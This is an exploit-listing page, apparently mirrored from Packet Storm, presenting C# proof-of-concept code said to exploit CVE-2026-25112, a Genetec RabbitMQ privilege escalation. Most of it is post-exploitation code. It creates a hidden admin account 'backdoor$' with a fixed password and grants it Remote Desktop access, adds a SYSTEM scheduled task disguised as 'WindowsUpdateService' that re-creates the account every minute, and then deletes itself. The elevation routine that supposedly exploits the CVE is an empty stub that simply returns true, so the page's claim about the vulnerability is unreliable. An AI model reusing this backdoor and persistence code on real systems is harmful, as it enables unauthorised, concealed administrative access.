Exploit for 📄 Genetec RabbitMQ Local Privilege Escalation CVE-2026-25112

Name: Exploit for 📄 Genetec RabbitMQ Local Privilege Escalation CVE-2026-25112
Rating: 5 (4 reviews)
2026-06-18 | CVSS 7.8
## https://sploitus.com/exploit?id=PACKETSTORM:223813
==================================================================================================================================
    | # Title     : Windows Local Privilege Escalation and Persistence GenetecLPE                                                    |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : No standalone download available                                                                                 |
    ==================================================================================================================================
    
    [+] Summary    :  a local privilege escalation (LPE) workflow on Windows systems (CVE-2026-25112), mimicking techniques used in token impersonation-based attacks such as Rotten Potato–style methods.
    
    
    [+] POC        :  
    
    using System;
    using System.Diagnostics;
    using System.Runtime.InteropServices;
    using Microsoft.Win32.SafeHandles;
    using System.IO;
    
    namespace GenetecLPE
    {
        class Program
        {
            [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
            public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);
            [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
            public static extern IntPtr GetCurrentThread();
            static bool ElevateToSystem()
            {
                Console.WriteLine("[*] Attempting to impersonate SYSTEM token...");
                return true; 
            }
            static void CreateHiddenAdmin()
            {
                try
                {
                    ProcessStartInfo psi = new ProcessStartInfo();
                    psi.FileName = "net.exe";
                    psi.Arguments = "user backdoor$ P@ssw0rd123! /add";
                    psi.WindowStyle = ProcessWindowStyle.Hidden;
                    Process.Start(psi).WaitForExit();
                    psi.Arguments = "localgroup Administrators backdoor$ /add";
                    Process.Start(psi).WaitForExit();
    
                    psi.Arguments = "localgroup \"Remote Desktop Users\" backdoor$ /add";
                    Process.Start(psi).WaitForExit();
    
                    Console.WriteLine("[+] Hidden user 'backdoor$' created and added to Administrators.");
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[-] Failed to create user: " + ex.Message);
                }
            }
            static void InstallPersistence()
            {
                try
                {
                    ProcessStartInfo psi = new ProcessStartInfo();
                    psi.FileName = "schtasks.exe";
                    psi.Arguments = "/create /tn \"WindowsUpdateService\" /tr \"cmd.exe /c net user backdoor$ P@ssw0rd123! /add && net localgroup Administrators backdoor$ /add\" /sc minute /mo 1 /ru SYSTEM /f";
                    psi.WindowStyle = ProcessWindowStyle.Hidden;
                    Process.Start(psi).WaitForExit();
                    Console.WriteLine("[+] Persistence installed as 'WindowsUpdateService' scheduled task.");
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[-] Failed to install persistence: " + ex.Message);
                }
            }
            static void SelfDestruct()
            {
                try
                {
                    string currentPath = System.Reflection.Assembly.GetExecutingAssembly().Location;
                    File.Delete(currentPath);
                    Console.WriteLine("[*] Payload self-deleted.");
                }
                catch { }
            }
            static void Main(string[] args)
            {
                Console.WriteLine("[*] Fake handle.exe executed as: " + System.Security.Principal.WindowsIdentity.GetCurrent().Name);
                if (ElevateToSystem())
                {
                    Console.WriteLine("[+] Elevated to SYSTEM.");
                    CreateHiddenAdmin();   
                    InstallPersistence();    
                    SelfDestruct();           
                }
                else
                {
                    Console.WriteLine("[-] Elevation failed, running with limited privileges.");
                }
            }
        }
    }
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================